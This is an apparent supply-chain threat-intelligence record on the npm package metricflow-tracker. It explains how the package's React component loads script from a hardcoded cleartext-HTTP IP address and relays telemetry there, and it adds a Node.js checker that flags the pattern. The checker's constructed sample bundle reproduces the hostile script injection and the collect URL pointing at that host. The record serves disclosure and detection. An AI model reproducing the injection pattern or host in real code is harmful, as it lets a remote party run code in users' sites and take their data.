Supply-chain threat intelligence
Risk score: 92
Indexed incident for metricflow-tracker (npm).
The package's exported Metricflow React component defaults serverUrl to http://51.38.65.105:21531 and, when rendered, appends a <script src="${serverUrl}/TrakLab-plugin/Dev/tracklab.js"> tag to document.head in the consumer's web application (dist/index.js line 18). The fetched JavaScript executes with full DOM and same-origin access in any site that uses the component.

The source is a bare IPv4 address over cleartext HTTP at a mutable /Dev/ path with no Subresource Integrity, no version pinning, and no TLS: whoever controls that IP, and any on-path network attacker, can serve arbitrary JavaScript into the consumer's application.

Additionally, window.MetricflowConfig.collectUrl defaults to http://51.38.65.105:21531/collect, silently relaying end-user telemetry collected by the loaded tracker to the same hardcoded host. Package metadata provides no author, homepage, or documentation tying that IP to a legitimate analytics vendor.

The combination of remote-code-loading from an unverified mutable HTTP endpoint plus silent relay of end-user data to an opaque destination is supply-chain harm to any installer that renders this component.
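An added example, not code from the package or from this record's source: a Node.js static check that flags the pattern described above, namely hardcoded cleartext-HTTP URLs on bare IPv4 hosts combined with a dynamically injected script tag that sets no Subresource Integrity. SAMPLE_BUNDLE is constructed from the description, and the function names are hypothetical.

```javascript
// Constructed sample mirroring the behaviour described above (not the package's real code).
const SAMPLE_BUNDLE = [
  'const serverUrl = props.serverUrl || "http://51.38.65.105:21531";',
  'window.MetricflowConfig = { collectUrl: "http://51.38.65.105:21531/collect" };',
  'const s = document.createElement("script");',
  's.src = `${serverUrl}/TrakLab-plugin/Dev/tracklab.js`;',
  'document.head.appendChild(s);',
  'const api = "https://api.example.com/v1/health";',
].join("\n");

const URL_RE = /https?:\/\/[^\s"'`<>)]+/g;
const IPV4_RE = /^\d{1,3}(\.\d{1,3}){3}$/;

// Flag every URL literal that is cleartext HTTP and/or points at a bare IPv4 host.
function auditUrls(source) {
  const findings = [];
  source.split("\n").forEach((text, i) => {
    for (const raw of text.match(URL_RE) || []) {
      let u;
      try { u = new URL(raw); } catch { continue; } // skip unparsable fragments
      const reasons = [];
      if (u.protocol === "http:") reasons.push("cleartext-http");
      if (IPV4_RE.test(u.hostname)) reasons.push("bare-ipv4-host");
      if (reasons.length) findings.push({ line: i + 1, url: raw, reasons });
    }
  });
  return findings;
}

// Detect a script element that is created and attached without an integrity value.
function auditScriptInjection(source) {
  const creates = /createElement\(\s*["']script["']\s*\)|<script\b[^>]*\bsrc=/i.test(source);
  const attaches = /\.(appendChild|append|insertBefore)\(|<script\b/i.test(source);
  const setsSri = /\.integrity\s*=|\bintegrity=/.test(source);
  return { dynamicScript: creates && attaches, missingSri: creates && !setsSri };
}

// High risk = unpinned dynamic script load plus a cleartext bare-IP endpoint.
function auditBundle(source) {
  const urls = auditUrls(source);
  const script = auditScriptInjection(source);
  const bareIpHttp = urls.some((f) => f.reasons.length === 2);
  return { urls, script, highRisk: script.dynamicScript && script.missingSri && bareIpHttp };
}

console.log(JSON.stringify(auditBundle(SAMPLE_BUNDLE), null, 2));
```

Run it over the files in a dependency's dist/ directory before adoption; a highRisk result warrants manual review, and a Content-Security-Policy script-src allowlist in the consuming application blocks such a load at runtime.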